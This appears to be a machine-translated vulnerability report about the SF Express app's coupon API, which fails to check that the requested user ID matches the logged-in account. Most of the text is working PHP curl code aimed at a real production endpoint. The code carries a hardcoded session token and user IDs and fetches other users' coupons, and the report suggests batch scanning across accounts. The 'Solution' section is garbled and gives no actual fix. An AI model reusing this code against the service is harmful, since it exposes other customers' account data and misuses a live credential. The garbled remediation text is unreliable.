SF app verifies user vulnerabilities and obtains coupons and solutions for others in batches.

SF app verifies user vulnerabilities and obtains coupons and solutions for others in batches.

The SF Express app did not verify the account currently logged in when querying SF coupons, so that you can view SF coupons under other accounts.

$nn=800008231073;$url = "http://abs-core.sf-express.com/api/user/getCoupons";    $ch = curl_init();$request='status=%27EFFE%27%2C&amt=&couponType=&method=getCoupons&user_id='.$nn;curl_setopt($ch, CURLOPT_POSTFIELDS, $request);    curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HTTPHEADER, array('token:xhGXygoAVBF1qFpZZrUuccFznrTXK23V','userid:800008495436'));curl_setopt($ch, CURLOPT_CONNECTTIMEOUT,1);   curl_setopt($ch, CURLOPT_NOSIGNAL,500);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);    curl_setopt($ch, CURLOPT_HEADER, 0); $re=curl_exec($ch);     curl_close($ch);$re= json_decode($re);print_r($re);

The above is the demo

$ Nn is the account id, which can be changed at will. It is easy to create a batch Scan software.

 

For example, this is a scanned coupon.

Solution:

Array ('token: xhGXygoAVBF1qFpZZrUuccFznrTXK23V ', 'userid: 800008495436 '));

Verify this


 

<?phplogin('800008231073');function login($nn) {  //login$url = "http://abs-core.sf-express.com/api/user/getCoupons";    $ch = curl_init();$request='status=%27EFFE%27%2C&amt=&couponType=&method=getCoupons&user_id='.$nn;curl_setopt($ch, CURLOPT_POSTFIELDS, $request);    curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HTTPHEADER, array('token:xhGXygoAVBF1qFpZZrUuccFznrTXK23V','userid:800008490435'));curl_setopt($ch, CURLOPT_CONNECTTIMEOUT,1);   curl_setopt($ch, CURLOPT_NOSIGNAL,500);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);    curl_setopt($ch, CURLOPT_HEADER, 0); $re=curl_exec($ch);     curl_close($ch);$re= json_decode($re);  print_r($re);    return $re;}?>